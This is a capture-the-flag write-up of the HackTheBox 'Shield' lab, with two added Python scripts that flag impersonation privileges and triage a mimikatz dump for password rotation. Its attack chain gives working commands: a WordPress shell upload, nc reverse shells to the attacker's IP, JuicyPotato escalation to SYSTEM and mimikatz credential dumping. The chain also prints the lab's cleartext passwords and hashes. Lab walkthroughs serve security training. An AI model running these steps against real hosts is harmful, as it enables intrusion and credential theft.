HTB-Shield
Main text
Nothing special about the ports; browsing to the host directly just shows the default Windows Server IIS page. No leads, so straight to the tools.
lao@laolao:~/桌面$ sudo nmap -sS -Pn -A 10.10.10.29
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-12 22:40 CST
Nmap scan report for localhost (10.10.10.29)
Host is up (0.22s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
3306/tcp open  mysql   MySQL (unauthorized)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016|2012|10 (91%)
OS CPE: cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_server_2012 cpe:/o:microsoft:windows_10:1607
Aggressive OS guesses: Microsoft Windows Server 2016 (91%), Microsoft Windows Server 2012 (85%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (85%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows 10 1607 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   225.37 ms localhost (10.10.14.1)
2   225.39 ms localhost (10.10.10.29)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.56 seconds
lao@laolao:~/桌面$
dirsearch turned up a WordPress site with a login page. Running sqlmap against it gave nothing. Ugh, what now, so annoying. Only after checking the write-up (WP) did I learn the password: admin:P@s5w0rd!, which comes from the previous box. Spitting blood 😒
lao@laolao:~/桌面$ dirsearch -u http://10.10.10.29/

  _|. _ _  _  _  _ _|_    v0.4.1
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10877

Output File: /home/lao/.dirsearch/reports/10.10.10.29/_21-08-12_22-48-51.txt

Error Log: /home/lao/.dirsearch/logs/errors-21-08-12_22-48-51.log

Target: http://10.10.10.29/

[22:48:51] Starting:
[22:48:53] 403 -  312B  - /%2e%2e//google.com
[22:49:09] 403 -  312B  - /\..\..\..\..\..\..\..\..\..\etc\passwd
[22:49:10] 301 -    0B  - /Wordpress/  ->  http://10.10.10.29/wordpress/
[22:50:05] 200 -    3KB - /wordpress/wp-login.php
[22:50:05] 200 -   24KB - /wordpress/

Task Completed
lao@laolao:~/桌面$
I searched msf for WordPress exploit modules and looked them up at https://www.rapid7.com/db/, annotating a few. I meant to annotate all of them, but gave up; most of them are plugin and theme vulnerabilities.
Matching Modules
================

   #   Name  Disclosure Date  Rank  Check  Description
   -   ----  ---------------  ----  -----  -----------
   0   exploit/freebsd/local/rtld_execl_priv_esc  2009-11-30  excellent  Yes  FreeBSD rtld execl() Privilege Escalation
   1   exploit/unix/webapp/joomla_akeeba_unserialize  2014-09-29  excellent  Yes  Joomla Akeeba Kickstart Unserialize Remote Code Execution
   2   exploit/windows/fileformat/ms12_005  2012-01-10  excellent  No  MS12-005 Microsoft Office ClickOnce Unsafe Object Package Handling Vulnerability
   3   exploit/unix/webapp/php_xmlrpc_eval  2005-06-29  excellent  Yes  PHP XML-RPC Arbitrary Code Execution
   4   exploit/multi/http/wp_db_backup_rce  2019-04-24  excellent  Yes  WP Database Backup RCE
       # WP-DB-Backup, the WordPress database backup plugin
   5   exploit/windows/fileformat/winrar_name_spoofing  2009-09-28  excellent  No  WinRAR Filename Spoofing
   6   exploit/multi/http/wp_ait_csv_rce  2020-11-14  excellent  Yes  WordPress AIT CSV Import Export Unauthenticated Remote Code Execution
       # AIT CSV Import/Export plugin: lets an unauthenticated remote attacker upload and execute arbitrary PHP code; the upload handler requires no authentication and does not validate the uploaded content; files are uploaded to wp-content/uploads/.
   7   exploit/unix/webapp/wp_admin_shell_upload  2015-02-21  excellent  Yes  WordPress Admin Shell Upload
       # This module generates a plugin, packs the payload into it and uploads it to a server running WordPress, given valid administrator credentials.
   8   exploit/unix/webapp/wp_asset_manager_upload_exec  2012-05-26  excellent  Yes  WordPress Asset-Manager PHP File Upload Vulnerability
       # Asset-Manager <= 2.0 plugin: by abusing upload.php, a malicious user can upload files to a temporary directory without authentication, leading to arbitrary code execution.
   9   exploit/multi/http/wp_crop_rce  2019-02-19  excellent  Yes  WordPress Crop-image Shell Upload
       # This module exploits a path traversal and local file inclusion vulnerability in WordPress 5.0.0 and <= 4.9.8. The crop-image feature lets a user with at least Author privileges resize an image and perform a path traversal by changing the _wp_attached_file reference during upload.
   10  exploit/unix/webapp/wp_holding_pattern_file_upload  2015-02-11  excellent  Yes  WordPress Holding Pattern Theme Arbitrary File Upload
       # This module exploits a file upload vulnerability in all versions of the Holding Pattern theme, in the upload_file.php script, which has no session or file validation. It lets unauthenticated users upload files of any type and then execute PHP scripts in the context of the web server.
   11  exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload  2016-05-04  excellent  Yes  WordPress Ninja Forms Unauthenticated File Upload
       # Ninja Forms plugin versions 2.9.36 through 2.9.42 contain an unauthenticated file upload vulnerability that lets guests upload arbitrary PHP code executable in the context of the web server.
   12  exploit/unix/webapp/wp_optimizepress_upload  2013-11-29  excellent  Yes  WordPress OptimizePress Theme File Upload Vulnerability
       # This module exploits a vulnerability found in the WordPress theme OptimizePress. The vulnerability is an insecure file upload in the media-upload.php component, which lets an attacker upload arbitrary PHP code. Tested successfully on OptimizePress 1.45.
   13  exploit/unix/webapp/wp_photo_gallery_unrestricted_file_upload  2014-11-11  excellent  Yes  WordPress Photo Gallery Unrestricted File Upload
       # The Photo Gallery plugin for WordPress contains a flaw that lets a remote attacker execute arbitrary PHP code. The flaw exists because the photo-gallery\photo-gallery.php script allows access to filemanager\UploadHandler.php, whose post() method does not properly verify or sanitize user-uploaded files. Tested on version 1.2.5.
   14  exploit/unix/webapp/wp_pixabay_images_upload  2015-01-19  excellent  Yes  WordPress Pixabay Images PHP Code Upload
       # This module exploits multiple vulnerabilities in the WordPress plugin Pixabay Images 2.3.6. The plugin does not check the host of the supplied download URL, which can be used to store and execute malicious PHP code on the system.
   15  exploit/unix/webapp/wp_platform_exec  2015-01-21  excellent  No  WordPress Platform Theme File Upload Vulnerability
       # The WordPress theme "platform" contains a remote code execution vulnerability through an unchecked admin_init call. The theme uses PHP's include to include an uploaded file from its temporary filename.
   16  exploit/unix/webapp/wp_advanced_custom_fields_exec  2012-11-14  excellent  Yes  WordPress Plugin Advanced Custom Fields Remote File Inclusion
       # This module exploits a remote file inclusion flaw in the WordPress plugin Advanced Custom Fields. The vulnerability allows remote file inclusion and remote code execution through the export.php script. Advanced Custom Fields versions 3.5.1 and below are vulnerable. The exploit only works when the PHP option allow_url_include is set to On (default Off).
   17  exploit/unix/webapp/wp_foxypress_upload  2012-06-05  excellent  Yes  WordPress Plugin Foxypress uploadify.php Arbitrary Code Execution
       # This module exploits an arbitrary PHP code execution flaw in the WordPress plugin Foxypress. The vulnerability allows arbitrary file upload and remote code execution through the uploadify.php script. Foxypress versions 0.4.1.1 through 0.4.2.1 are vulnerable.
   18  exploit/multi/http/wp_responsive_thumbnail_slider_upload  2015-08-28  excellent  Yes  WordPress Responsive Thumbnail Slider Arbitrary File Upload
   19  exploit/unix/webapp/wp_revslider_upload_execute  2014-11-26  excellent  Yes  WordPress RevSlider File Upload and Execute Vulnerability
   20  exploit/unix/webapp/wp_total_cache_exec  2013-04-17  excellent  Yes  WordPress W3 Total Cache PHP Code Execution
   21  exploit/unix/webapp/wp_easycart_unrestricted_file_upload  2015-01-08  excellent  No  WordPress WP EasyCart Unrestricted File Upload
   22  exploit/unix/webapp/wp_mobile_detector_upload_execute  2016-05-31  excellent  Yes  WordPress WP Mobile Detector 3.5 Shell Upload
   23  exploit/unix/webapp/wp_symposium_shell_upload  2014-12-11  excellent  Yes  WordPress WP Symposium 14.11 Shell Upload
   24  exploit/unix/webapp/wp_property_upload_exec  2012-03-26  excellent  Yes  WordPress WP-Property PHP File Upload Vulnerability
   25  exploit/unix/webapp/wp_wptouch_file_upload  2014-07-14  excellent  Yes  WordPress WPTouch Authenticated File Upload
   26  exploit/unix/webapp/wp_wpshop_ecommerce_file_upload  2015-03-09  excellent  Yes  WordPress WPshop eCommerce Arbitrary File Upload Vulnerability
   27  exploit/unix/webapp/wp_lastpost_exec  2005-08-09  excellent  No  WordPress cache_lastpostdate Arbitrary Code Execution
   28  exploit/unix/webapp/wp_ajax_load_more_file_upload  2015-10-10  excellent  Yes  Wordpress Ajax Load More PHP Upload Vulnerability
   29  exploit/unix/webapp/wp_creativecontactform_file_upload  2014-10-22  excellent  Yes  Wordpress Creative Contact Form Upload Vulnerability
   30  exploit/unix/webapp/wp_downloadmanager_upload  2014-12-03  excellent  Yes  Wordpress Download Manager (download-manager) Unauthenticated File Upload
   31  exploit/multi/http/wp_dnd_mul_file_rce  2020-05-11  excellent  Yes  Wordpress Drag and Drop Multi File Uploader RCE
   32  exploit/unix/webapp/wp_frontend_editor_file_upload  2012-07-04  excellent  Yes  Wordpress Front-end Editor File Upload
   33  exploit/unix/webapp/wp_inboundio_marketing_file_upload  2015-03-24  excellent  Yes  Wordpress InBoundio Marketing PHP Upload Vulnerability
   34  exploit/unix/webapp/wp_infusionsoft_upload  2014-09-25  excellent  Yes  Wordpress InfusionSoft Upload Vulnerability
   35  exploit/unix/webapp/wp_wysija_newsletters_upload  2014-07-01  excellent  Yes  Wordpress MailPoet Newsletters (wysija-newsletters) Unauthenticated File Upload
   36  exploit/unix/webapp/wp_nmediawebsite_file_upload  2015-04-12  excellent  Yes  Wordpress N-Media Website Contact Form Upload Vulnerability
   37  exploit/unix/webapp/wp_plainview_activity_monitor_rce  2018-08-26  excellent  Yes  Wordpress Plainview Activity Monitor RCE
   38  exploit/unix/webapp/wp_reflexgallery_file_upload  2012-12-30  excellent  Yes  Wordpress Reflex Gallery Upload Vulnerability
   39  exploit/unix/webapp/wp_slideshowgallery_upload  2014-08-28  excellent  Yes  Wordpress SlideShow Gallery Authenticated File Upload
   40  exploit/unix/webapp/wp_worktheflow_upload  2015-03-14  excellent  Yes  Wordpress Work The Flow Upload Vulnerability
   41  exploit/unix/webapp/jquery_file_upload  2018-10-09  excellent  Yes  blueimp's jQuery (Arbitrary) File Upload

Interact with a module by name or index. For example info 41, use 41 or use exploit/unix/webapp/jquery_file_upload

msf6 >
The payload worked, nice~ but this session keeps disconnecting, and running shell does not help either.
msf6 > use exploit/unix/webapp/wp_admin_shell_upload
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_admin_shell_upload) > show options

Module options (exploit/unix/webapp/wp_admin_shell_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       The WordPress password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   USERNAME                    yes       The WordPress username to authenticate with
   VHOST                       no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.102    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   WordPress

msf6 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD P@s5w0rd!
PASSWORD => P@s5w0rd!
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS 10.10.10.29
RHOSTS => 10.10.10.29
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME admin
USERNAME => admin
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set Lhost 10.10.14.115
Lhost => 10.10.14.115
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURI /wordpress/
TARGETURI => /wordpress/
msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit

[*] Started reverse TCP handler on 10.10.14.115:4444
[*] Authenticating with WordPress using admin:P@s5w0rd!...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /wordpress/wp-content/plugins/HrVHXHQuCk/PquYexuTsY.php...
[*] Sending stage (39282 bytes) to 10.10.10.29
[+] Deleted PquYexuTsY.php
[+] Deleted HrVHXHQuCk.php
[*] Meterpreter session 1 opened (10.10.14.115:4444 -> 10.10.10.29:50240) at 2021-08-13 16:37:17 +0800
[!] This exploit may require manual cleanup of '../HrVHXHQuCk' on the target

meterpreter >
One method I found is to use nc to establish a reverse shell from the other side (the old routine again). Use find to locate where nc is stored in Kali and copy it to the desktop (my msf was started from the desktop).
lao@laolao:~/桌面$ sudo find / -name "nc.exe"
lao@laolao:~/桌面$ cp /usr/share/windows-resources/binaries/nc.exe .
Upload it through msf and run execute -f nc.exe -a "-e cmd.exe 10.10.14.115 5555" (with nc listening on 5555 first). execute runs a command; -f is followed by the command to run, and -a passes the arguments to that command. In other words, it runs nc -e cmd.exe 10.10.14.115 5555, which sends the target's shell back to Kali.
meterpreter > cd ../../
meterpreter > ls
Listing: C:\inetpub\wwwroot\wordpress\wp-content
================================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  28    fil   2019-05-30 17:55:42 +0800  index.php
40777/rwxrwxrwx   4096  dir   2021-08-14 03:10:06 +0800  plugins
40777/rwxrwxrwx   4096  dir   2020-02-12 02:23:34 +0800  themes
40777/rwxrwxrwx   0     dir   2021-08-14 03:10:06 +0800  upgrade
40777/rwxrwxrwx   4096  dir   2021-08-14 03:10:06 +0800  uploads

meterpreter > cd uploads
meterpreter > upload nc.exe
[*] uploading  : /home/lao/桌面/nc.exe -> nc.exe
[*] Uploaded -1.00 B of 58.00 KiB (-0.0%): /home/lao/桌面/nc.exe -> nc.exe
[*] uploaded   : /home/lao/桌面/nc.exe -> nc.exe
meterpreter > execute -f nc.exe -a "-e cmd.exe 10.10.14.115 5555"
Process 2996 created.
Then upload JuicyPotato (烂土豆) through msf. It is a Windows local privilege escalation tool that abuses COM objects to escalate; compared with RottenPotatoNG it works in a wider range of situations. Check the privileges before using it; here the token has SeImpersonatePrivilege.
C:\inetpub\wwwroot\wordpress\wp-content\uploads>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

C:\inetpub\wwwroot\wordpress\wp-content\uploads>
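The SeImpersonatePrivilege in that table is what the token-impersonation step that follows depends on, and it is what a hardening review of service identities should look for. As an added example (not part of the write-up), this Python script parses `whoami /priv` output and flags a token that holds either impersonation privilege; the sample input is constructed to match the dump above.

```python
"""Flag token-impersonation privileges in `whoami /priv` output.

Added example, not from the write-up. SeImpersonatePrivilege and
SeAssignPrimaryTokenPrivilege are the two privileges the Potato-style
token-impersonation tools require; a service identity (such as an IIS
application pool) that holds either one and can be made to run code is
a direct path to SYSTEM, so a hardening review should flag them.
"""
import re
from typing import Dict, List, Tuple

# Constructed sample, matching the dump taken from the box in the write-up.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

IMPERSONATION_PRIVILEGES = ("SeAssignPrimaryTokenPrivilege", "SeImpersonatePrivilege")

# One table row: privilege name, free-text description, then Enabled/Disabled.
_ROW = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$")


def parse_whoami_priv(text: str) -> Dict[str, str]:
    """Return {privilege: state} for every row of a `whoami /priv` dump."""
    privs: Dict[str, str] = {}
    for line in text.splitlines():
        m = _ROW.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(2)
    return privs


def held_impersonation_privileges(privs: Dict[str, str]) -> List[str]:
    """Impersonation privileges present in the token, whatever their state.

    `whoami /priv` prints Disabled for a privilege the token holds but has
    not enabled; the owning process can enable it at will, so presence in
    the table, not the State column, is what matters for the assessment.
    """
    return [p for p in IMPERSONATION_PRIVILEGES if p in privs]


def assess(text: str) -> Tuple[str, List[str]]:
    """Summarise a dump as ('HIGH' | 'LOW', [held impersonation privileges])."""
    held = held_impersonation_privileges(parse_whoami_priv(text))
    return ("HIGH" if held else "LOW"), held


if __name__ == "__main__":
    level, held = assess(SAMPLE_WHOAMI_PRIV)
    print(f"{level}: token holds {', '.join(held) or 'no impersonation privileges'}")
```

On the dump above the verdict is HIGH, because the token holds both privileges even though SeAssignPrimaryTokenPrivilege is reported as Disabled.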
In the nc shell on 5555, write a shell.bat script whose content sends a PowerShell back to Kali.
lao@laolao:~/桌面$ nc -lnvp 5555
listening on [any] 5555 ...
connect to [10.10.14.115] from (UNKNOWN) [10.10.10.29] 58630
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\inetpub\wwwroot\wordpress\wp-content\uploads>echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.115 1111 > shell.bat
Listen with nc on 1111, then run JuicyPotato in the nc shell on 5555 above.
Command breakdown:
- -t <createprocess call>: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both
  - if SeImpersonatePrivilege is enabled, use -t t
  - if SeAssignPrimaryTokenPrivilege is enabled, use -t u
  - if both are enabled, you can choose -t *
  - if neither is enabled, escalation is not possible
- -p <program>: run the specified program
- -l <port>: COM server listen port
- -m <ip>: COM server listen address (default 127.0.0.1)
- -a <argument>: command-line argument passed to the program (default NULL)
- -k <ip>: RPC server IP address (default 127.0.0.1)
- -n <port>: RPC server listen port (default 135)
- -c <{clsid}>: CLSID (default BITS: {4991d34b-80a1-4291-83b6-3328366b9097}) https://github.com/ohpe/juicy-potato/tree/master/CLSID
- -z only test the CLSID and print the token's user
C:\inetpub\wwwroot\wordpress\wp-content\uploads>JuicyPotato.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\uploads\shell.bat -l 1337
JuicyPotato.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\uploads\shell.bat -l 1337
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337
......
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

C:\inetpub\wwwroot\wordpress\wp-content\uploads>
The nc listener on 1111 receives a PowerShell running as SYSTEM.
lao@laolao:~/桌面$ nc -lvnp 1111
listening on [any] 1111 ...
connect to [10.10.14.115] from (UNKNOWN) [10.10.10.29] 58695
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.115 1111 > shell.bat
Write-Output : Parameter cannot be processed because the parameter name 'e' is ambiguous. Possible matches include: -ErrorAction -ErrorVariable.
At line:1 char:67
+ ... ART C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powersh ...
+                                                                 ~~
    + CategoryInfo          : InvalidArgument: (:) [Write-Output], ParameterBindingException
    + FullyQualifiedErrorId : AmbiguousParameter,Microsoft.PowerShell.Commands.WriteOutputCommand

PS C:\Windows\system32> cd c:\users\administrator\desktop
cd c:\users\administrator\desktop
PS C:\users\administrator\desktop> dir
dir

    Directory: C:\users\administrator\desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         2/25/2020   1:28 PM             32 root.txt

PS C:\users\administrator\desktop> type root.txt
type root.txt
6e9a9fdc6f64e410a68b847bb4b404fa
PS C:\users\administrator\desktop>
Although this could end here, the usual routine is to go one step further and lay the groundwork for the next box: run mimikatz (猕猴桃) to work toward the domain controller. This yields an account: sandra, Password1234!
PS C:\inetpub\wwwroot\wordpress\wp-content\uploads> .\mimikatz_64.exe
.\mimikatz_64.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 1830598 (00000000:001beec6)
Session           : Service from 0
User Name         : DefaultAppPool
Domain            : IIS APPPOOL
Logon Server      : (null)
Logon Time        : 8/13/2021 10:51:22 AM
SID               : S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
        msv :
         [00000003] Primary
         * Username : SHIELD$
         * Domain   : MEGACORP
         * NTLM     : 9d4feee71a4f411bf92a86b523d64437
         * SHA1     : 0ee4dc73f1c40da71a60894eff504cc732de82da
        tspkg :
        wdigest :
         * Username : SHIELD$
         * Domain   : MEGACORP
         * Password : (null)
        kerberos :
         * Username : SHIELD$
         * Domain   : MEGACORP.LOCAL
         * Password : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:NM6@-a+qJt_l887Ew&m_ewr??#VE&
        ssp :
        credman :

Authentication Id : 0 ; 307425 (00000000:0004b0e1)
Session           : Interactive from 1
User Name         : sandra
Domain            : MEGACORP
Logon Server      : PATHFINDER
Logon Time        : 8/13/2021 10:35:36 AM
SID               : S-1-5-21-1035856440-4137329016-3276773158-1105
        msv :
         [00000003] Primary
         * Username : sandra
         * Domain   : MEGACORP
         * NTLM     : 29ab86c5c4d2aab957763e5c1720486d
         * SHA1     : 8bd0ccc2a23892a74dfbbbb57f0faa9721562a38
         * DPAPI    : f4c73b3f07c4f309ebf086644254bcbc
        tspkg :
        wdigest :
         * Username : sandra
         * Domain   : MEGACORP
         * Password : (null)
        kerberos :
         * Username : sandra
         * Domain   : MEGACORP.LOCAL
         * Password : Password1234!
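Note that wdigest shows (null) for every session while the kerberos provider still held sandra's cleartext password. From the defender's side, a dump like this is a rotation list. As an added example (not part of the write-up and not mimikatz code), the Python below parses a sekurlsa::logonpasswords dump in the format above, lists user accounts whose cleartext password was sitting in LSASS (machine accounts, whose names end in $, are expected there and skipped) and returns every account whose secrets must be rotated; the hash and machine-account values in the sample are constructed placeholders.

```python
"""Triage a mimikatz sekurlsa::logonpasswords dump after a compromise.
Added example, not from the write-up or from mimikatz. It parses the dump
format shown above, lists user accounts whose cleartext password was in
LSASS, and builds the rotation list. Hash values are constructed placeholders."""
from typing import Dict, List, Tuple

SAMPLE_DUMP = """\
Authentication Id : 0 ; 1830598 (00000000:001beec6)
User Name         : DefaultAppPool
Domain            : IIS APPPOOL
        kerberos :
         * Username : SHIELD$
         * Domain   : MEGACORP.LOCAL
         * Password : <constructed-machine-account-secret>

Authentication Id : 0 ; 307425 (00000000:0004b0e1)
User Name         : sandra
Domain            : MEGACORP
        msv :
         * Username : sandra
         * NTLM     : <constructed-ntlm-hash>
        wdigest :
         * Username : sandra
         * Domain   : MEGACORP
         * Password : (null)
        kerberos :
         * Username : sandra
         * Domain   : MEGACORP.LOCAL
         * Password : Password1234!
"""

PROVIDERS = {"msv", "tspkg", "wdigest", "kerberos", "ssp", "credman"}


def parse_sessions(text: str) -> List[Dict]:
    """Split the dump into sessions: {"user": ..., "secrets": {provider: {field: value}}}."""
    sessions, cur, prov = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Authentication Id"):
            cur, prov = {"user": "", "secrets": {}}, None
            sessions.append(cur)
        elif cur is None:
            continue  # banner or prompt text before the first session
        elif line.startswith("User Name"):
            cur["user"] = line.split(":", 1)[1].strip()
        elif line.endswith(":") and line[:-1].strip() in PROVIDERS:
            prov = line[:-1].strip()  # a provider header such as "kerberos :"
        elif line.startswith("*") and prov:
            key, _, val = line.lstrip("* ").partition(":")
            cur["secrets"].setdefault(prov, {})[key.strip()] = val.strip()
    return sessions


def cleartext_exposures(sessions: List[Dict]) -> List[Tuple[str, str, str]]:
    """(username, domain, provider) for each user account with a cleartext password
    in memory; machine accounts (names ending in $) are expected and skipped."""
    hits = []
    for s in sessions:
        for prov, f in s["secrets"].items():
            user, pw = f.get("Username", s["user"]), f.get("Password", "(null)")
            if pw != "(null)" and not user.endswith("$"):
                hits.append((user, f.get("Domain", ""), prov))
    return hits


def accounts_to_rotate(sessions: List[Dict]) -> List[str]:
    """Every account with any secret (hash or password) in the dump must be rotated."""
    return sorted({f["Username"] for s in sessions
                   for f in s["secrets"].values() if "Username" in f})
```

Run against a full dump, the rotation list also picks up the computer account, whose NTLM hash appears in every service session on the box.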